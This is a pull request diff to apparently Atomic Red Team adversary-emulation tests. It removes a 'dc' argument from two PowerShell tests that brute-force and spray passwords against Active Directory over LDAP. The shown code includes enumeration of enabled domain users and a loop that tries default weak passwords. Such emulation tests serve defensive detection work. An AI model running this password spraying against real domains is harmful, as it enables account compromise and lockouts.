### PR TITLE
Remove "dc" argument from password attacks

### DIFF
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -47,10 +47,6 @@ atomic_tests:
       description: List of passwords we will attempt to brute force with
       type: String
       default: Password1`n1q2w3e4r`nPassword!
-    dc:
-      description: Name of the domain controller we will target (without domain FQDN suffix)
-      type: String
-      default: dc
     domain:
       description: Domain FQDN
       type: String
@@ -69,7 +65,7 @@ atomic_tests:
       }
 
       [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
-      $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{dc}.#{domain}",389)
+      $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)
 
       $passwords = "#{passwords}".split("{`n}")
       foreach ($password in $passwords){

--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -58,6 +58,8 @@ atomic_tests:
   auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
   description: |
     Attempt to brute force all domain user with a couple of passwords (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
+
+    Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
   supported_platforms:
   - windows
   input_arguments:
@@ -65,10 +67,6 @@ atomic_tests:
       description: list of passwords we will attempt to brute force with (not too many, else it's more a bruteforce than a password spraying)
       type: String
       default: 123456`npassword
-    dc:
-      description: Name of the domain controller we will target (without domain FQDN suffix)
-      type: String
-      default: dc
     domain:
       description: Domain FQDN
       type: String
@@ -86,10 +84,10 @@ atomic_tests:
         exit 1
       }
 
-      $DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' | Select-Object -ExpandProperty SamAccountName
+      $DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName
 
       [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
-      $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{dc}.#{domain}",389)
+      $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)
 
       $passwords = "#{passwords}".split("{`n}")
       $DomainUsers | Foreach-Object {


### PR DESCRIPTION
Better to have it implicit: one less argument to specify